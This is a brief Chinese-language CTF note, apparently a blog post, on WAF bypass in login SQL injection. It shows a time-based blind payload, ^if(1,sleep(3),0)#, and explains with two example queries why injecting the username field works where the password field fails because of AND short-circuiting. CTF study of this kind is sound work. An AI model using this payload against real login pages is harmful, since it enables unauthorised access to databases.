ctf.show-WAF绕过
经验:
在进行登陆SQL注入的时候, 有限注入username字段
举例说明:
payload: ^if(1,sleep(3),0)#
如果注入password, 后端:
SELECT * FROM users WHERE username = 'any' AND password = '1'^if(1,sleep(3),0)#'
因为AND的短路效应, username='any'为false, SQL直接返回false了, 根本不会执行后面的内容
SELECT * FROM users WHERE username = '1'^if(1,sleep(3),0)#' AND password = 'any'
payload被成功的执行了
posted on 2026-01-02 16:52 misaki%20mei 阅读(0) 评论(0) 收藏 举报
浙公网安备 33010602011771号